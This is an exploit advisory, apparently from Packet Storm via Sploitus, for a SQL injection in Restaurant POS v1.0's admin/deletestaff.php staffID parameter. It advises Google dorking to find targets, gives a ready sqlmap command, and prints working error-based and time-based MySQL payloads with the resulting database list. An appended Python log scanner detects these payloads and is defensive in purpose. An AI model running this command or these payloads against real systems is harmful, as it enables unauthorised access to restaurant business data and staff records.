## https://sploitus.com/exploit?id=PACKETSTORM:181832
=============================================================================================================================================
| # Title : Restaurant POS v1.0 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html |
=============================================================================================================================================
poc :
[+] Dorking In Google Or Other Search Engine.
[+] use payload : admin/deletestaff.php?staffID=1
[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
[+] ---
GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:
---
Parameter: staffID (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)
---
[22:32:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.30, Apache 2.4.58, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[22:32:22] [INFO] fetching database names
[22:32:22] [INFO] starting 7 threads
[22:32:22] [INFO] retrieved: 'bangresto'
[22:32:22] [INFO] retrieved: 'cms'
[22:32:22] [INFO] retrieved: 'phpmyadmin'
[22:32:22] [INFO] retrieved: 'mysql'
[22:32:22] [INFO] retrieved: 'test'
[22:32:22] [INFO] retrieved: 'information_schema'
[22:32:22] [INFO] retrieved: 'performance_schema'
available databases [7]:
[*] bangresto
[*] ending @ 22:32:22 /2024-08-16/
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
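
A defender-side check for the requests this PoC generates, as an added example that is not part of the original advisory: it scans web-server access logs for calls to admin/deletestaff.php whose staffID is not a plain integer and labels the two techniques sqlmap reported. The log lines are constructed, and treating staffID as numeric-only is an assumption based on the staffID=1 value in the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not captured traffic). Requests 2 and 3 carry the
# two payloads from the sqlmap output above, URL-encoded as a client sends them.
SAMPLE_LOG = """\
127.0.0.1 - - [16/Aug/2024:22:31:05 +0000] "GET /bangresto-main/admin/deletestaff.php?staffID=1 HTTP/1.1" 302 -
127.0.0.1 - - [16/Aug/2024:22:31:40 +0000] "GET /bangresto-main/admin/deletestaff.php?staffID=1%20AND%20EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT%20(ELT(5264=5264,1))),0x7162787071)) HTTP/1.1" 200 512
127.0.0.1 - - [16/Aug/2024:22:31:58 +0000] "GET /bangresto-main/admin/deletestaff.php?staffID=1+AND+(SELECT+3481+FROM+(SELECT(SLEEP(5)))frXm) HTTP/1.1" 200 -
127.0.0.1 - - [16/Aug/2024:22:32:10 +0000] "GET /bangresto-main/admin/staff.php HTTP/1.1" 200 4096
"""

# Common/combined log format prefix: client, timestamp, method, target, status.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Labels follow the two technique names in the sqlmap report.
SIGNATURES = [
    ("error-based", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
]

def find_suspicious(log_text, path_suffix="/admin/deletestaff.php", param="staffID"):
    """Return one finding per request whose `param` is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(path_suffix):
            continue
        # parse_qs percent-decodes and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumption: a staff id is always a plain integer
            labels = [n for n, rx in SIGNATURES if rx.search(value)]
            findings.append({"client": client, "time": when, "status": status,
                             "value": value, "labels": labels or ["non-integer value"]})
    return findings

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["time"], f["client"], f["labels"], f["value"])
```

The integer check is the primary signal; the keyword labels only help triage, so a payload using neither function is still reported as "non-integer value".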